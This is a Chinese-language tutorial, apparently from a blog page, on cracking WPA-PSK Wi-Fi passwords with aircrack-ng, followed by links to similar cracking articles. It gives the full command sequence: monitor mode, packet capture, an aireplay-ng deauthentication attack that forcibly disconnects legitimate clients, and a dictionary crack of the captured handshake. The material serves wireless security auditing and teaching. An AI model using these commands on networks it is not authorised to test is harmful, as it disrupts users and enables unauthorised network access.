1、传统的WPA-PSK加密破解:

WPA-PSK的破解基于WPA-PSK握手验证报文数据的获取与识别,攻击者只要能够获取到WPA-PSK握手数据报文,就可以导入Aircrack-ng 进行暴力破解,下面将破解WPA-PSK的标准步骤列举,然后将其中最关键的步骤予以详细说明。

注意:wlan0为无线网卡名称,mon0为处于激活状态下的无线网卡名称,eth0为有线网卡

步骤:

  1. 检查无线网卡芯片的设置模式:iwconfig wlan0
  2. 将无线网卡芯片的模式从”Managed”设置为”monitor”模式

先:  ifconfig wlan0 down

然后:iwconfig  wlan0  mode  monitor

  1. 激活无线网卡:

Ifconfig wlan0 up

  1. 启动无线网卡的监控模式:

Airmon-ng start wlan0

  1. 用airmon-ng 工具,抓包,进行预探测,来获取当前无线网络概况,包括AP的SSID、MAC地址、工作频道、无线客户端的MAC地址及数量等。

Airodump-ng mon0

  1. 开始捕获无线数据包,也可以使用--ivs参数来设定只捕获ivs数据

Airodump-ng -w 文件名  -c  频道  mon0

  1. 进行Deauth攻击获取WPA握手报文

Aireplay-ng -0 10 -a AP的mac  -c  客户端的mac   wlan0

说明:和WEP时不同,这里为了获取破解所需的WPA-PSK握手验证的整个完整数据包,无线黑客们将会发送一种称之为“Deauth”的数据包来将已经连接至无线路由器的合法无线客户端强制断开,此时,客户端就会自动重新连接无线路由器,黑客们便有机会捕获到包含WPA-PSK握手验证的完整数据包。

参数解释:

-0,采用deauth攻击模式,后面跟上攻击次数,这里是10,大家可以根据实际情况设置为5-10不等;

-a,后面跟上AP的MAC地址

-c,后跟客户端的MAC地址;

  1. 破解WPA密码:

Aircrack-ng -w dic 捕获的cap文件

参数解释:

-w   ,后跟预先制作的字典

无线网络WPA-PSK加密破解相关推荐

  1. Kali渗透测试(四)——无线网络WPA攻击(PSK破解、AIROLIB、JTR、cowpatty、pyrit)

    无线网络WPA的攻击 主要有PSK攻击和AIROLIB.JTR.cowpatty.pyrit等工具的使用 (一)WPA PSK 攻击 WPA不存在WEP的弱点,只能基于字典暴力破解 PSK破解过程 启 ...

  2. Wi-Fi无线网络(WPA2加密)快速破解 ——某公司无线设备安全隐患报告

    Wi-Fi无线网络(WPA2加密)快速破解 --某公司无线设备安全隐患报告 评估人:阿牛 2013年12月12日 文件夹 一. 导言 2 二. 背景 2 三. 无线产品应当採取的安全策略 3 四. 存 ...

  3. 无线网络WPA加密算法基础

    2013-11-13 23:08 (分类:网络安全) 对无线没什么认识,总听说有人蹭网,还有卖蹭网器的,于是补充一下知识. 无线加密有两类:WEP WAP,目前采用WEP加密的非常少了,WEP应该只是 ...

  4. WPA/WPA2加密破解

    WPA/WPA2无线密码破解这里主要介绍两种方法:穷举PIN码.穷举密码 穷举PIN码(共11000种组合)破解速度快,需要一些条件(路由器支持WPS.QSS功能),路由器信号良好.无论密码多复杂,条 ...

  5. 使用Aircrack-ng工具破解WEP、WPA/WPA2加密的无线网络

    特别声明:本文是参照"9.2 使用Aircrack-ng工具破解无线网络"进行实验的.链接为:https://wizardforcel.gitbooks.io/daxueba-ka ...

  6. [backtrack教程]从零开始,教你如何破解WEP、WPA无线网络

    http://www.backtrack.org.cn/viewthread.php?tid=1000 [backtrack教程]从零开始,教你如何破解WEP.WPA无线网络 教程, 网络, WPA, ...

  7. 从零开始,教你如何破解WEP、WPA无线网络 密码

    近些年无线技术发展迅速,越来越多的用户开始使用无线网络,最近新搬到一小区没有安装网络,后面想到以前出差时在机场用过无线网络,小区内是否也有无线网络呢?随便一搜,果然有几个无线网络信号,于是打起了免费蹭 ...

  8. 从零开始破解WEP、WPA无线网络

    以前出差时在机场用过无线网络,小区内是否也有无线网络呢?随便一搜,果然有几个无线网络信号,于是打起了免费蹭网的主意,但信号最好的几个网络的WEP或WPA密码成为了一个门坎,于是在公司上网查到相关资料, ...

  9. 无线网络渗透测试-使用Aircrack-ng工具破解无线网络

    破解WEP加密的无线网络 Wired Equivalent Privacy或WEP(有线等效加密)协议是对在两台设备间无线传输的数据进行加密的方式,用以防止非法用户窃听或侵入无线网络.不过密码分析学家 ...

  10. 6.5 【加密和安全】- 重合指数 无线网络

    专栏:牛客网刷题 1.重合指数法对下面哪种密码算法的破解最有效() 置换密码 单表代换密码 多表代换密码 序列密码 重合指数 重合指数(IC,Index of Coincidence)是指数学上的一种 ...

最新文章

  1. java operators_Java Basic Operators
  2. python基础语法有哪些-Python基础语法知识有哪些?
  3. 3.2.1 OS之虚拟内存的基本概念(局部性原理、高速缓存、虚拟内存的实现)
  4. spring中bean的细节之三种创建Bean对象的方式
  5. 前端学习(2183):tabber--基本架构的构建
  6. 复盘阿里城市大脑这3年
  7. 10、什么是WEB端
  8. ASP.NET核心之路微服务第03部分:Identity
  9. linux的创建线程池,Linux下通用线程池的创建与使用(上) (3)
  10. Package sqlite3 was not found in the pkg-config search path.add the directory containing `sqlite3.pc
  11. 反向传播算法BP公式推导
  12. Java是否存在内存泄露
  13. netty开发tcp数据传输编解码框架使用
  14. ad敷铜后还有部分飞线_难以置信!小霸王卡带中居然藏有隐藏游戏,大部分玩家闻所未闻|小霸王|游戏|魂斗罗|卡带|红白机...
  15. python label显示图片_Python3 tkinter基础 Label imag显示图片
  16. 厦门大学计算机调剂要求,厦门大学调剂公告
  17. java中abstract什么意思中文,abstraction(abstraction什么意思中文)
  18. 免费语音转文字的软件有哪些?快来看看这几个软件
  19. 模式识别八--三层BP神经网络的设计与实现
  20. [转]我的FLASH情结2010——浅谈FLASH WEB GAME与创业(下)

热门文章

  1. 湖南大学ACM程序设计新生杯大赛(同步赛)L-Liao Han【打表规律+二分】
  2. android 6.0 vs ios9,安卓6.0彻底看呆!iOS 9安装率曝光 完胜
  3. Arduino Pro IDE,你终于长大了!
  4. python selenium span_如何使用selenium从span获取文本
  5. 【4500字归纳总结】一名软件测试工程师需要掌握的技能大全
  6. [转] 怎么固定KMPlayer窗口大小
  7. JPEG图像格式解析
  8. 世界上第一次网络瘫痪 | 历史上的今天
  9. kettle打开spoon.bat后无反应
  10. Python转UTC世界标准时间(包含T和Z) 成为北京时间